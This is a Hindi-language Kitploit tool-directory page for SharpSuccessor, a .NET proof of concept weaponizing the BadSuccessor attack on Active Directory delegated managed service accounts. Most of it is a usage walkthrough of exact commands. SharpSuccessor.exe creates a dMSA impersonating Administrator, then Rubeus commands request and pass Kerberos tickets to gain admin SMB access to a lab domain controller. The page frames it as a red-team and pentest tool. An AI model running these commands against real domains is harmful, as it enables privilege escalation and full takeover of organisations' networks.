Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
SharpSuccessor — SharpSuccessor is a .NET Proof of Concept (POC) for fully weaponizing Yuval Gordon’s (@YuG0rd) BadSuccessor attack from Akamai. | Kitploit
उपकरण/GitHubGitHub/logangoins/sharpsuccessor
Privilege EscalationExploitationPost-ExploitationPenetration TestingIdentity & Access Management (IAM)AuthenticationRed Teaming
GitHublogangoins/sharpsuccessor

SharpSuccessor

SharpSuccessor is a .NET Proof of Concept (POC) for fully weaponizing Yuval Gordon’s (@YuG0rd) BadSuccessor attack from Akamai.

रिपॉजिटरी देखें
4217010 महीने पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

SharpSuccessor

SharpSuccessor, Akamai के Yuval Gordon (@YuG0rd) के BadSuccessor हमले को पूरी तरह से हथियारबंद करने के लिए एक .NET प्रूफ ऑफ कॉन्सेप्ट (POC) है। Active Directory डोमेन में किसी भी Organizational Unit (OU) पर CreateChild अनुमति और लक्ष्य ऑब्जेक्ट पर लेखन पहुंच रखने वाला एक कम-विशेषाधिकार वाला उपयोगकर्ता खाता अधिग्रहण (account takeover) कर सकता है।

SharpSuccessor का उपयोग dMSA ऑब्जेक्ट को जोड़ने और हथियारबंद करने के साथ-साथ उस लक्ष्य खाते पर सही विशेषताएँ लिखने के लिए करें जिसे आप impersonate करना चाहते हैं:

root@kitploit:~
SharpSuccessor.exe add /impersonate:Administrator /path:"ou=test,dc=lab,dc=lan" /account:jdoe /name:attacker_dMSA

image

वर्तमान उपयोगकर्ता संदर्भ में TGT का अनुरोध करें, इस मामले में jdoe:

root@kitploit:~
Rubeus.exe tgtdeleg /nowrap

image

फिर उस tgt का उपयोग करके dMSA खाते को impersonate करें:

root@kitploit:~
Rubeus.exe asktgs /targetuser:attacker_dmsa$ /service:krbtgt/lab.lan /opsec /dmsa /nowrap /ptt /ticket:doIFTDCCB.....

image

अब आप किसी भी SPN के लिए Administrator संदर्भ के साथ सर्विस टिकट का अनुरोध कर सकते हैं, जिसमें पोस्ट-एक्सप्लॉइटेशन के लिए Domain Controllers भी शामिल हैं। उदाहरण के लिए, यहाँ मैं डोमेन कंट्रोलर पर SMB के लिए व्यवस्थापक (admin) विशेषाधिकार दिखाऊँगा:

root@kitploit:~
Rubeus.exe asktgs /user:attacker_dmsa$ /service:cifs/WIN-RAEAN26UGJ5.lab.lan /opsec /dmsa /nowrap /ptt /ticket:doIF2DCCBdS...

image

अब जब टिकट मेमोरी में है, हम पहुंच का परीक्षण कर सकते हैं:

image

सहायता और प्रेरणाएँ

इस टूल के लिए प्रेरणा और सहायता देने हेतु Jim Sykora और Garrett Foster का हार्दिक धन्यवाद!

टूल डाउनलोड करें